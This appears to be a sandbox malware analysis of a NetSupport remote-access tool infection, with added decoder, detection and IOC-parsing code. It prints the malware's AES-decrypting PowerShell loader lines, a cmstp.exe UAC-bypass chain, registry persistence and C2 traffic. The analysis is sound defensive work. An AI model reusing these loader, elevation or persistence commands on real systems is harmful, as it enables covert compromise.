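    $gzBytes = $ms.ToArray()
    $aes = [System.Security.Cryptography.Aes]::Create()
    $aes.Mode    = [System.Security.Cryptography.CipherMode]::ECB
    $aes.Padding = [System.Security.Cryptography.PaddingMode]::Zeros
    $aes.KeySize = 256
    $aes.Key     = [Convert]::FromBase64String($KeyB64)
    $enc = $aes.CreateEncryptor()
    $ct  = $enc.TransformFinalBlock($gzBytes, 0, $gzBytes.Length)
    $enc.Dispose(); $aes.Dispose()
    $prefix = New-Object byte[] 16
    [System.Security.Cryptography.RandomNumberGenerator]::Create().GetBytes($prefix)
    [Convert]::ToBase64String([byte[]]($prefix + $ct))
}

# Round trip on constructed input with the key from the report; then decode the
# real blob by assigning the $uGSyEn string from the command line above to $uGSyEn.
$key  = 'ZWdYRXFVeWZGcVZNVlJXYWxURnRZc2ZZeFFoUk9XSWQ='
$test = New-TestLoaderBlob -Text 'Write-Host constructed-sample' -KeyB64 $key
if ((ConvertFrom-LoaderBlob -CipherTextB64 $test -KeyB64 $key) -ne 'Write-Host constructed-sample') { throw 'round trip failed' }
# $stage2 = ConvertFrom-LoaderBlob -CipherTextB64 $uGSyEn -KeyB64 $key   # read $stage2; never Invoke-Expression it
```

The returned text is the script that the sandbox's next powershell.exe instances (PIDs 4572 and 2944 in the process tree) received on stdin; read it in an editor rather than running it. Because the mode is ECB, identical 16-byte plaintext blocks produce identical ciphertext blocks, which is also why the same blob in the cmd.exe and nested powershell.exe command lines is byte-for-byte reusable across stages.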

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c powershell.exe $uGSyEn = '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';$QcRGrPc = 'ZWdYRXFVeWZGcVZNVlJXYWxURnRZc2ZZeFFoUk9XSWQ=';$WpXrWka = New-Object 'System.Security.Cryptography.AesManaged';$WpXrWka.Mode = [System.Security.Cryptography.CipherMode]::ECB;$WpXrWka.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$WpXrWka.BlockSize = 128;$WpXrWka.KeySize = 256;$WpXrWka.Key = [System.Convert]::FromBase64String($QcRGrPc);$SSGYL = [System.Convert]::FromBase64String($uGSyEn);$yAgygcvl = $SSGYL[0..15];$WpXrWka.IV = $yAgygcvl;$ixbKtdOeJ = $WpXrWka.CreateDecryptor();$AbQURXmxw = $ixbKtdOeJ.TransformFinalBlock($SSGYL, 16, $SSGYL.Length - 16);$WpXrWka.Dispose();$tZUSbrft = New-Object System.IO.MemoryStream( , $AbQURXmxw );$UfhVzIKO = New-Object System.IO.MemoryStream;$KFAgbvVxM = New-Object System.IO.Compression.GzipStream $tZUSbrft, ([IO.Compression.CompressionMode]::Decompress);$KFAgbvVxM.CopyTo( $UfhVzIKO );$KFAgbvVxM.Close();$tZUSbrft.Close();[byte[]] $qvUGhdu = $UfhVzIKO.ToArray();$AjSplBV = [System.Text.Encoding]::UTF8.GetString($qvUGhdu);$AjSplBV | powershell -

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell.exe $uGSyEn = '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';$QcRGrPc = 'ZWdYRXFVeWZGcVZNVlJXYWxURnRZc2ZZeFFoUk9XSWQ=';$WpXrWka = New-Object 'System.Security.Cryptography.AesManaged';$WpXrWka.Mode = [System.Security.Cryptography.CipherMode]::ECB;$WpXrWka.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$WpXrWka.BlockSize = 128;$WpXrWka.KeySize = 256;$WpXrWka.Key = [System.Convert]::FromBase64String($QcRGrPc);$SSGYL = [System.Convert]::FromBase64String($uGSyEn);$yAgygcvl = $SSGYL[0..15];$WpXrWka.IV = $yAgygcvl;$ixbKtdOeJ = $WpXrWka.CreateDecryptor();$AbQURXmxw = $ixbKtdOeJ.TransformFinalBlock($SSGYL, 16, $SSGYL.Length - 16);$WpXrWka.Dispose();$tZUSbrft = New-Object System.IO.MemoryStream( , $AbQURXmxw );$UfhVzIKO = New-Object System.IO.MemoryStream;$KFAgbvVxM = New-Object System.IO.Compression.GzipStream $tZUSbrft, ([IO.Compression.CompressionMode]::Decompress);$KFAgbvVxM.CopyTo( $UfhVzIKO );$KFAgbvVxM.Close();$tZUSbrft.Close();[byte[]] $qvUGhdu = $UfhVzIKO.ToArray();$AjSplBV = [System.Text.Encoding]::UTF8.GetString($qvUGhdu);$AjSplBV

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -ExecutionPolicy UnRestricted -Encoded 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

C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\beumlt25\beumlt25.cmdline"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES42F0.tmp" "c:\Users\Admin\AppData\Local\Temp\beumlt25\CSCF5AF3DF95E0D4AF7A03E278C2DF0CAFC.TMP"

C:\Windows\SysWOW64\cmstp.exe

"C:\Windows\system32\cmstp.exe" /au "C:\Users\Admin\AppData\Local\Temp\CMSTP.inf"

C:\Windows\SysWOW64\DllHost.exe

C:\Windows\SysWOW64\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy unrestricted -WindowStyle hidden -Encoded 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

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" Add HKEY_CLASSES_ROOT\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\shell\open\command /f /ve /t REG_SZ /d C:\Users\Admin\AppData\Roaming\IonicBaseband\client32.exe

C:\Users\Admin\AppData\Roaming\IonicBaseband\client32.exe

"C:\Users\Admin\AppData\Roaming\IonicBaseband\client32.exe"

C:\Windows\SysWOW64\taskkill.exe

taskkill /IM cmstp.exe /F
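The last part of the process list is an elevation chain. powershell.exe (PID 4784) compiles C# on the fly (csc.exe, cvtres.exe) and then starts cmstp.exe /au with a CMSTP.inf from %TEMP% (the .inf content is not in the report). {3E5FC7F9-9A51-4367-9063-A120244FBEC7} is the CLSID of CMSTPLUA, an auto-elevating COM server hosted by DllHost.exe, and it is that DllHost (PID 3548), not cmstp.exe, that spawns the encoded powershell.exe (PID 4596) which writes the HKLM persistence with reg.exe and launches client32.exe, and then runs taskkill /IM cmstp.exe /F to close the cmstp window that /au leaves on screen. This is the documented cmstp.exe UAC bypass (ATT&CK T1548.002 via T1218.003): the HKLM\SOFTWARE\Classes write in the Modifies registry class table only succeeds because reg.exe is a descendant of the elevated DllHost. The block below is an added example, not part of the report: detection logic for the three observable parts of that chain, run over process-creation records constructed from the rows above (with the -Encoded arguments elided as "...") rather than read from any log format.

```powershell
# Added example (not part of the report): detection logic for the cmstp.exe /
# CMSTPLUA elevation chain, run over constructed process-creation records.
$CmstpLuaClsid = '{3E5FC7F9-9A51-4367-9063-A120244FBEC7}'   # CMSTPLUA COM server, hosted by DllHost.exe

function Test-CmstpElevationChain {
    param([Parameter(Mandatory)][object[]]$Events)   # objects with Pid, ParentPid, Image, CommandLine
    $byPid = @{}
    foreach ($e in $Events) { $byPid[[int]$e.Pid] = $e }
    foreach ($e in $Events) {
        $parent = $byPid[[int]$e.ParentPid]

        # 1. cmstp.exe /au installing an .inf that does not live under the Windows directory
        if ($e.Image -like '*\cmstp.exe' -and $e.CommandLine -match '(?i)\s/au\s' -and
            $e.CommandLine -match '(?i)\.inf' -and $e.CommandLine -notmatch '(?i)\\Windows\\[^"]*\.inf') {
            [pscustomobject]@{ Rule = 'cmstp_au_user_inf'; Pid = $e.Pid; Image = $e.Image; Detail = $e.CommandLine }
        }

        # 2. A DllHost.exe hosting CMSTPLUA has no business spawning shells, script hosts or admin tools
        if ($parent -and $parent.Image -like '*\DllHost.exe' -and
            $parent.CommandLine -match [regex]::Escape($CmstpLuaClsid) -and
            $e.Image -match '(?i)\\(powershell|pwsh|cmd|reg|taskkill|rundll32|mshta|wscript|cscript)\.exe$') {
            [pscustomobject]@{ Rule = 'cmstplua_dllhost_child'; Pid = $e.Pid; Image = $e.Image; Detail = "parent $($parent.Pid): $($parent.CommandLine)" }
        }

        # 3. Killing cmstp.exe by image name: cleanup of the window that /au leaves behind
        if ($e.Image -like '*\taskkill.exe' -and $e.CommandLine -match '(?i)/IM\s+cmstp\.exe') {
            [pscustomobject]@{ Rule = 'taskkill_cmstp'; Pid = $e.Pid; Image = $e.Image; Detail = $e.CommandLine }
        }
    }
}

# Constructed records reproducing the relevant part of the process tree above
# (parent/child links taken from the WriteProcessMemory rows; DllHost's own parent is not in the report).
$sample = @(
    [pscustomobject]@{ Pid = 4784; ParentPid = 2944; Image = 'C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe'; CommandLine = 'powershell.exe -WindowStyle hidden -ExecutionPolicy UnRestricted -Encoded ...' }
    [pscustomobject]@{ Pid = 2188; ParentPid = 4784; Image = 'C:\Windows\SysWOW64\cmstp.exe';   CommandLine = '"C:\Windows\system32\cmstp.exe" /au "C:\Users\Admin\AppData\Local\Temp\CMSTP.inf"' }
    [pscustomobject]@{ Pid = 3548; ParentPid = 0;    Image = 'C:\Windows\SysWOW64\DllHost.exe'; CommandLine = 'C:\Windows\SysWOW64\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}' }
    [pscustomobject]@{ Pid = 4596; ParentPid = 3548; Image = 'C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe'; CommandLine = 'powershell.exe -ExecutionPolicy unrestricted -WindowStyle hidden -Encoded ...' }
    [pscustomobject]@{ Pid = 364;  ParentPid = 4596; Image = 'C:\Windows\SysWOW64\reg.exe';     CommandLine = '"C:\Windows\system32\reg.exe" Add HKEY_CLASSES_ROOT\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\shell\open\command /f /ve /t REG_SZ /d C:\Users\Admin\AppData\Roaming\IonicBaseband\client32.exe' }
    [pscustomobject]@{ Pid = 4696; ParentPid = 3548; Image = 'C:\Windows\SysWOW64\taskkill.exe'; CommandLine = 'taskkill /IM cmstp.exe /F' }
)
$hits = @(Test-CmstpElevationChain -Events $sample)
$hits | Format-Table Rule, Pid, Image -AutoSize
if ($hits.Count -ne 4) { throw "expected 4 hits, got $($hits.Count)" }   # cmstp /au, two DllHost children, taskkill
```

Against the constructed records the function returns four hits: the cmstp.exe /au launch (PID 2188), the two children of the CMSTPLUA DllHost (powershell.exe 4596 and taskkill.exe 4696) and the taskkill command line itself. Rule 2 is the one worth alerting on by itself; rules 1 and 3 add confidence and, on a host with Sysmon or Security 4688 process auditing, the same three conditions translate directly into a correlation over ParentProcessId.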

Network

Country Destination Domain Proto
US 8.8.8.8:53 59.128.231.4.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 assets.msn.com udp
NL 95.101.74.111:443 assets.msn.com tcp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 111.74.101.95.in-addr.arpa udp
US 8.8.8.8:53 69.121.18.2.in-addr.arpa udp
US 8.8.8.8:53 208.194.73.20.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 tds-images.thedailystar.net udp
US 151.101.1.55:443 tds-images.thedailystar.net tcp
US 8.8.8.8:53 55.1.101.151.in-addr.arpa udp
US 8.8.8.8:53 cbngummies.com udp
US 198.57.244.151:443 cbngummies.com tcp
US 8.8.8.8:53 151.244.57.198.in-addr.arpa udp
US 198.57.244.151:443 cbngummies.com tcp
US 8.8.8.8:53 conluase62.com udp
US 94.158.247.27:5051 conluase62.com tcp
US 8.8.8.8:53 geo.netsupportsoftware.com udp
GB 62.172.138.67:80 geo.netsupportsoftware.com tcp
US 8.8.8.8:53 27.247.158.94.in-addr.arpa udp
US 8.8.8.8:53 67.138.172.62.in-addr.arpa udp
US 8.8.8.8:53 126.153.241.8.in-addr.arpa udp
US 8.8.8.8:53 assets.msn.com udp
NL 95.101.74.111:443 assets.msn.com tcp
US 8.8.8.8:53 203.151.224.20.in-addr.arpa udp
US 8.8.8.8:53 9.173.189.20.in-addr.arpa udp

Files

memory/1368-134-0x00000000717D0000-0x0000000071F80000-memory.dmp

memory/1368-133-0x0000000004F30000-0x0000000004F66000-memory.dmp

memory/1368-135-0x0000000005070000-0x0000000005080000-memory.dmp

memory/1368-136-0x00000000056B0000-0x0000000005CD8000-memory.dmp

memory/1368-137-0x0000000005550000-0x0000000005572000-memory.dmp

memory/1368-138-0x0000000005D50000-0x0000000005DB6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_enzew10p.31g.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1368-139-0x0000000005EF0000-0x0000000005F56000-memory.dmp

memory/1368-149-0x0000000006530000-0x000000000654E000-memory.dmp

memory/1368-150-0x0000000005070000-0x0000000005080000-memory.dmp

memory/1368-151-0x00000000074F0000-0x0000000007586000-memory.dmp

memory/1368-152-0x0000000006A30000-0x0000000006A4A000-memory.dmp

memory/1368-153-0x0000000006A80000-0x0000000006AA2000-memory.dmp

memory/1368-154-0x0000000007B40000-0x00000000080E4000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 def65711d78669d7f8e69313be4acf2e
SHA1 6522ebf1de09eeb981e270bd95114bc69a49cda6
SHA256 aa1c97cdbce9a848f1db2ad483f19caa535b55a3a1ef2ad1260e0437002bc82c
SHA512 05b2f9cd9bc3b46f52fded320b68e05f79b2b3ceaeb13e5d87ae9f8cd8e6c90bbb4ffa4da8192c2bfe0f58826cabff2e99e7c5cc8dd47037d4eb7bfc6f2710a7

memory/1368-158-0x00000000717D0000-0x0000000071F80000-memory.dmp

memory/2944-159-0x00000000717D0000-0x0000000071F80000-memory.dmp

memory/2944-160-0x0000000000BA0000-0x0000000000BB0000-memory.dmp

memory/4572-162-0x0000000004CB0000-0x0000000004CC0000-memory.dmp

memory/4572-161-0x00000000717D0000-0x0000000071F80000-memory.dmp

memory/4572-163-0x0000000004CB0000-0x0000000004CC0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 3fc4824e0a712206096191f319e6d6a9
SHA1 b546e0633e242d2bcb287a0d55baffb3d2e07f10
SHA256 8c2d4f119b4d5fa2ac1639a33717f1c086afd0154c524c21979868f04314455b
SHA512 404c05fb107d25c9834865c377afe079eb0a8180140eb6a78c54e2f87fb776c9602c3bbe3ca39721f943cec68750c53d46732cc019fcee348060f276a221ce49

memory/2944-184-0x0000000006EA0000-0x0000000006EE4000-memory.dmp

memory/4572-183-0x0000000004CB0000-0x0000000004CC0000-memory.dmp

memory/4572-185-0x0000000007A40000-0x00000000080BA000-memory.dmp

memory/2944-186-0x0000000007020000-0x0000000007096000-memory.dmp

memory/2944-187-0x0000000000BA0000-0x0000000000BB0000-memory.dmp

memory/4572-189-0x00000000717D0000-0x0000000071F80000-memory.dmp

memory/2944-191-0x00000000717D0000-0x0000000071F80000-memory.dmp

memory/2944-192-0x0000000000BA0000-0x0000000000BB0000-memory.dmp

memory/2944-193-0x0000000000BA0000-0x0000000000BB0000-memory.dmp

memory/2944-195-0x0000000007E20000-0x0000000007E52000-memory.dmp

memory/2944-196-0x000000006E090000-0x000000006E0DC000-memory.dmp

memory/2944-197-0x000000006E1F0000-0x000000006E544000-memory.dmp

memory/2944-207-0x0000000007E00000-0x0000000007E1E000-memory.dmp

memory/2944-208-0x0000000007F50000-0x0000000007F5A000-memory.dmp

memory/2944-209-0x0000000007FC0000-0x0000000007FD2000-memory.dmp

memory/2944-210-0x0000000007FA0000-0x0000000007FAA000-memory.dmp

memory/2944-233-0x0000000000BA0000-0x0000000000BB0000-memory.dmp

memory/4784-236-0x00000000717D0000-0x0000000071F80000-memory.dmp

memory/4784-237-0x0000000004A60000-0x0000000004A70000-memory.dmp

memory/4784-238-0x0000000004A60000-0x0000000004A70000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 3111b8507c855bf0afb1b82a6ceb5a3b
SHA1 09336fa120984ba60e90b8098780de5bc52edae8
SHA256 5b7a0fce85b816dd25edcf6e2a0224ab18411c510ec769cddb7859f5dce52ace
SHA512 171fb43f81c1643204d77291e2e02c91a79677d109365a726293d2fd0b63e7de419e484715bbf5992c7c3ce17f45ecb4fd20e3970f283eb2a3301e7a65c00d36

memory/4784-249-0x0000000004A60000-0x0000000004A70000-memory.dmp

\??\c:\Users\Admin\AppData\Local\Temp\beumlt25\beumlt25.cmdline

MD5 29a3f8c092a3b0faa5b6d042e1c978b0
SHA1 ed601829698514b97f8d9a4f70ace829f9478fb3
SHA256 55333cb538988a084f429900f2168606489020e5821a2ff47b02e18522fddce3
SHA512 a948e44aec0a83aadfea494a52710c444b02f607e3238a7415526d000d70392fe91777059f3b94f29ec995b9be44a33158281068985cf0076134a4927c8991fa

\??\c:\Users\Admin\AppData\Local\Temp\beumlt25\beumlt25.0.cs

MD5 7fbb3f2ac5a0040e7e42f8fc7cd6fbfe
SHA1 93fcde99bba753677f8786fbcdba4d695296bd12
SHA256 d3f7e6731d46ba381595954053ae69cf2cc2fa91c2a27ed8ed5154bebcd0f5d2
SHA512 3fe646607615f671d2aa1470a4c7ac0c55a463b56c210a8e1658a8961d2ff453647c7517cf4abed47f6d6f9679f9f67e08e02bf0515410fddd64545d3c4145f8

\??\c:\Users\Admin\AppData\Local\Temp\beumlt25\CSCF5AF3DF95E0D4AF7A03E278C2DF0CAFC.TMP

MD5 99098e74c736af4c6091d654bf437908
SHA1 fbdd75270a2a3199c06d500f375ac8a93d017d61
SHA256 736ab241ff665485982d66aca09acba8310e0a802564a4bf1b23b318d641f041
SHA512 e853007e310ff3698686283628cb7a04b223468776ab622c0e4ad50e7cc722b7011de5fbd678ce32e356256e495133bcf8261e2807f82ca30e59fcc08d167308

C:\Users\Admin\AppData\Local\Temp\RES42F0.tmp

MD5 e3c3a4cd024da909b42bf03908660705
SHA1 adb77c2454224fbbde4c497cbd9b293df83a35f7
SHA256 6917fd549295e47b30ee7be69d1c0fe21f01754330844aa0c8402146d7399944
SHA512 f665c38caf1059c06938830b393d09d3a0a282b622d2def10278eb78ec023a8831442fb40c122297371f13009447612e2e12a0194075d86cbc1791d7fa6bd0f3

C:\Users\Admin\AppData\Local\Temp\beumlt25\beumlt25.dll

MD5 66637d2c99c6e40bc6192f1efc4e0f2e
SHA1 9347c1d7d9bcaac204ca664577ae6381c1f74100
SHA256 64d079edcf82466a380644a127fa159a60c25527140846db5fe11dbf1e9dcd6b
SHA512 15b7aed37f2269603a902adcc44a94905d0a7a8d4aec34488527027282f0432095ce3950d2d9b12ebb3485939575ec96138791383ae202e3cae48f29a6850b13

C:\Users\Admin\AppData\Local\Temp\CMSTP.inf

MD5 efb6f1e28f266bb33cb2b76be37cc491
SHA1 f4cf1bafdccb11486ff7e5e877246e957cae90db
SHA256 d3e346fcadf02b7dcac1f2501434ebca5199be3775fbce22497e08b43ddc14bf
SHA512 259b297a8b0739cf6b2b6e7a3f0eba391b99e7346f333ab33b3e67554447609706a3268c34c2e4cabe31d970764d462b1cda25bb7c5416d846dad4092b2d0546

memory/4784-266-0x00000000717D0000-0x0000000071F80000-memory.dmp

memory/2944-267-0x000000007EF70000-0x000000007EF80000-memory.dmp

memory/4596-270-0x00000000717D0000-0x0000000071F80000-memory.dmp

memory/4596-271-0x0000000002B20000-0x0000000002B30000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 41df442e734dce300c0e13bef9a7da8a
SHA1 7593cd0d7c3f4e64d6049faeb04a5475b610a331
SHA256 173d3c0fc3c7dc8314848e1cad752e74a3d75089ebd997275cf2237fd6153aa4
SHA512 b38f023812a47cf001d07fb33a72ebdf81b697342d31db55d6a9824809779ba099d84a83a7cb140a7db643f4ab7645d151da3fa7e566061ad741b407c7709376

memory/2944-284-0x00000000717D0000-0x0000000071F80000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

MD5 bb7c45699212b8d044800fe3083e69eb
SHA1 c7c2f2122674983ae23e51409abe2e4d26ac4823
SHA256 960c36ba2442c541fa02f3035ed2e34051d6ffc77c241e719d212e9883efd7cf
SHA512 78557adba71183bc3f3f7d7ffbc69de502f19046617c4e8a4390316daf5e4eec4652e22416bd46d2beb20fbf3b7b7cf7ea565ff2fce1d2f5085b8e00766183dd

memory/4596-286-0x0000000002B20000-0x0000000002B30000-memory.dmp

C:\Users\Admin\AppData\Roaming\IonicBaseband\client32.exe

MD5 8d9709ff7d9c83bd376e01912c734f0a
SHA1 e3c92713ce1d7eaa5e2b1fabeb06cdc0bb499294
SHA256 49a568f8ac11173e3a0d76cff6bc1d4b9bdf2c35c6d8570177422f142dcfdbe3
SHA512 042ad89ed2e15671f5df67766d11e1fa7ada8241d4513e7c8f0d77b983505d63ebfb39fefa590a2712b77d7024c04445390a8bf4999648f83dbab6b0f04eb2ee

C:\Users\Admin\AppData\Roaming\IonicBaseband\PCICL32.DLL

MD5 00587238d16012152c2e951a087f2cc9
SHA1 c4e27a43075ce993ff6bb033360af386b2fc58ff
SHA256 63aa18c32af7144156e7ee2d5ba0fa4f5872a7deb56894f6f96505cbc9afe6f8
SHA512 637950a1f78d3f3d02c30a49a16e91cf3dfccc59104041876789bd7fdf9224d187209547766b91404c67319e13d1606da7cec397315495962cbf3e2ccd5f1226

C:\Users\Admin\AppData\Roaming\IonicBaseband\pcicapi.dll

MD5 dcde2248d19c778a41aa165866dd52d0
SHA1 7ec84be84fe23f0b0093b647538737e1f19ebb03
SHA256 9074fd40ea6a0caa892e6361a6a4e834c2e51e6e98d1ffcda7a9a537594a6917
SHA512 c5d170d420f1aeb9bcd606a282af6e8da04ae45c83d07faaacb73ff2e27f4188b09446ce508620124f6d9b447a40a23620cfb39b79f02b04bb9e513866352166

C:\Users\Admin\AppData\Roaming\IonicBaseband\PCICHEK.DLL

MD5 a0b9388c5f18e27266a31f8c5765b263
SHA1 906f7e94f841d464d4da144f7c858fa2160e36db
SHA256 313117e723dda6ea3911faacd23f4405003fb651c73de8deff10b9eb5b4a058a
SHA512 6051a0b22af135b4433474dc7c6f53fb1c06844d0a30ed596a3c6c80644df511b023e140c4878867fa2578c79695fac2eb303aea87c0ecfc15a4ad264bd0b3cd

C:\Users\Admin\AppData\Roaming\IonicBaseband\msvcr100.dll

MD5 0e37fbfa79d349d672456923ec5fbbe3
SHA1 4e880fc7625ccf8d9ca799d5b94ce2b1e7597335
SHA256 8793353461826fbd48f25ea8b835be204b758ce7510db2af631b28850355bd18
SHA512 2bea9bd528513a3c6a54beac25096ee200a4e6ccfc2a308ae9cfd1ad8738e2e2defd477d59db527a048e5e9a4fe1fc1d771701de14ef82b4dbcdc90df0387630

C:\Users\Admin\AppData\Roaming\IonicBaseband\MSVCR100.dll

MD5 0e37fbfa79d349d672456923ec5fbbe3
SHA1 4e880fc7625ccf8d9ca799d5b94ce2b1e7597335
SHA256 8793353461826fbd48f25ea8b835be204b758ce7510db2af631b28850355bd18
SHA512 2bea9bd528513a3c6a54beac25096ee200a4e6ccfc2a308ae9cfd1ad8738e2e2defd477d59db527a048e5e9a4fe1fc1d771701de14ef82b4dbcdc90df0387630

C:\Users\Admin\AppData\Roaming\IonicBaseband\pcichek.dll

MD5 a0b9388c5f18e27266a31f8c5765b263
SHA1 906f7e94f841d464d4da144f7c858fa2160e36db
SHA256 313117e723dda6ea3911faacd23f4405003fb651c73de8deff10b9eb5b4a058a
SHA512 6051a0b22af135b4433474dc7c6f53fb1c06844d0a30ed596a3c6c80644df511b023e140c4878867fa2578c79695fac2eb303aea87c0ecfc15a4ad264bd0b3cd

C:\Users\Admin\AppData\Roaming\IonicBaseband\PCICL32.dll

MD5 00587238d16012152c2e951a087f2cc9
SHA1 c4e27a43075ce993ff6bb033360af386b2fc58ff
SHA256 63aa18c32af7144156e7ee2d5ba0fa4f5872a7deb56894f6f96505cbc9afe6f8
SHA512 637950a1f78d3f3d02c30a49a16e91cf3dfccc59104041876789bd7fdf9224d187209547766b91404c67319e13d1606da7cec397315495962cbf3e2ccd5f1226

C:\Users\Admin\AppData\Roaming\IonicBaseband\client32.ini

MD5 c2fcdcd6299b04fbef530d7b144181d8
SHA1 43d8a39fb9a78b244b6740ac654be9fe84d32d31
SHA256 4536ff38e0ad3191aa7682ae532660f1b51d3d7f8dbcabb90fe9bdfa12eaada5
SHA512 4335f0721aeceaf3ce8aa492aea2f66d8dc1930d2963395d7c13768cc0d772d9cf3bdda4e00ad2335d919dfc430022eb64bf6157c2811175844cebf1629917cb

C:\Users\Admin\AppData\Roaming\IonicBaseband\NSM.LIC

MD5 7067af414215ee4c50bfcd3ea43c84f0
SHA1 c331d410672477844a4ca87f43a14e643c863af9
SHA256 2050cc232710a2ea6a207bc78d1eac66a4042f2ee701cdfeee5de3ddcdc31d12
SHA512 17b888087192bcea9f56128d0950423b1807e294d1c4f953d1bf0f5bd08e5f8e35afeee584ebf9233bfc44e0723db3661911415798159ac118c8a42aaf0b902f

C:\Users\Admin\AppData\Roaming\IonicBaseband\HTCTL32.DLL

MD5 2d3b207c8a48148296156e5725426c7f
SHA1 ad464eb7cf5c19c8a443ab5b590440b32dbc618f
SHA256 edfe2b923bfb5d1088de1611401f5c35ece91581e71503a5631647ac51f7d796
SHA512 55c791705993b83c9b26a8dbd545d7e149c42ee358ecece638128ee271e85b4fdbfd6fbae61d13533bf39ae752144e2cc2c5edcda955f18c37a785084db0860c

memory/4596-302-0x00000000717D0000-0x0000000071F80000-memory.dmp
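The listing above is the raw output of the sandbox: one path line, a blank line, one line per hash algorithm, with process memory dumps (memory/<pid>-<n>-<range>-memory.dmp) interleaved, the same file repeated when it was written more than once, and the same path reported with different hashes when its contents changed between writes. The script below is an added example, not part of the report, showing how to turn that listing into a deduplicated IOC set keyed on SHA256 (so exact repeats collapse, case variants such as PCICL32.DLL and PCICL32.dll stay attached to one hash, and the three StartupProfileData-NonInteractive entries stay separate) and how to hash files on a host against it. The NetSupport component names and the IonicBaseband drop directory are taken from the listing; the tag names are this example's own; treating the beumlt25\beumlt25.cmdline, .0.cs, .dll, RES42F0.tmp and CSC....TMP files as the csc.exe footprint of a PowerShell Add-Type compile is an analyst interpretation assumed here and not something the report states. The embedded excerpt copies real entries from the listing but drops the SHA1 and SHA512 lines for brevity.

```python
"""Added example, not part of the report: parse the sandbox 'Files' listing above
(path, blank, 'ALGO hex' lines, memory/... dumps interleaved) into deduplicated IOCs."""
import hashlib
import os
import re
from dataclasses import dataclass, field
from typing import Dict, List, Tuple

HASH_RE = re.compile(r"^(MD5|SHA1|SHA256|SHA512)\s+([0-9a-fA-F]+)$")
MEMDUMP_RE = re.compile(r"^memory/\d+-\d+-0x[0-9A-Fa-f]+-0x[0-9A-Fa-f]+-memory\.dmp$")
# NetSupport client files and their drop directory, as named in the listing above.
NETSUPPORT_DIR = "ionicbaseband"
NETSUPPORT_FILES = {"client32.exe", "client32.ini", "pcicl32.dll", "htctl32.dll",
                    "pcicapi.dll", "pcichek.dll", "nsm.lic", "msvcr100.dll"}
# <r8>\<r8>.cmdline/.0.cs/.dll, RESxxxx.tmp and CSC<32 hex>.TMP under %TEMP%: footprint of
# csc.exe compiling for PowerShell Add-Type (analyst interpretation assumed here, not stated by the report).
CSC_OUT_RE = re.compile(r"^([a-z0-9]{8})\.(?:cmdline|0\.cs|dll)$")
CSC_TMP_RE = re.compile(r"^(?:RES[0-9A-F]{4}\.tmp|CSC[0-9A-F]{32}\.TMP)$")

@dataclass
class Ioc:
    sha256: str
    paths: List[str] = field(default_factory=list)  # every path seen with this hash
    hashes: Dict[str, str] = field(default_factory=dict)
    tag: str = "other"

def classify(path: str) -> str:
    """Label a dropped-file path by what it most likely is (tags are this example's own)."""
    parts = path.split("\\")
    name, parent = parts[-1], (parts[-2] if len(parts) > 1 else "")
    if name.lower() in NETSUPPORT_FILES and parent.lower() == NETSUPPORT_DIR:
        return "netsupport_component"
    m = CSC_OUT_RE.match(name)
    if (m and m.group(1) == parent) or CSC_TMP_RE.match(name):
        return "powershell_compile_artifact"
    if "powershell" in path.lower() or name.lower().startswith("__psscriptpolicytest"):
        return "powershell_artifact"
    return "other"

def parse_listing(text: str) -> List[Ioc]:
    """Pair each path with the hash lines after it; merge entries on SHA256, keeping report order."""
    by_sha: Dict[str, Ioc] = {}
    current, pending = None, {}

    def flush():
        nonlocal current, pending
        if current and "SHA256" in pending:
            sha = pending["SHA256"]
            if sha not in by_sha:
                by_sha[sha] = Ioc(sha, hashes=dict(pending), tag=classify(current))
            if current not in by_sha[sha].paths:  # exact repeats collapse; case variants stay
                by_sha[sha].paths.append(current)
        current, pending = None, {}

    for line in (ln.strip() for ln in text.splitlines()):
        if not line or MEMDUMP_RE.match(line):
            continue  # memory dumps are not dropped files
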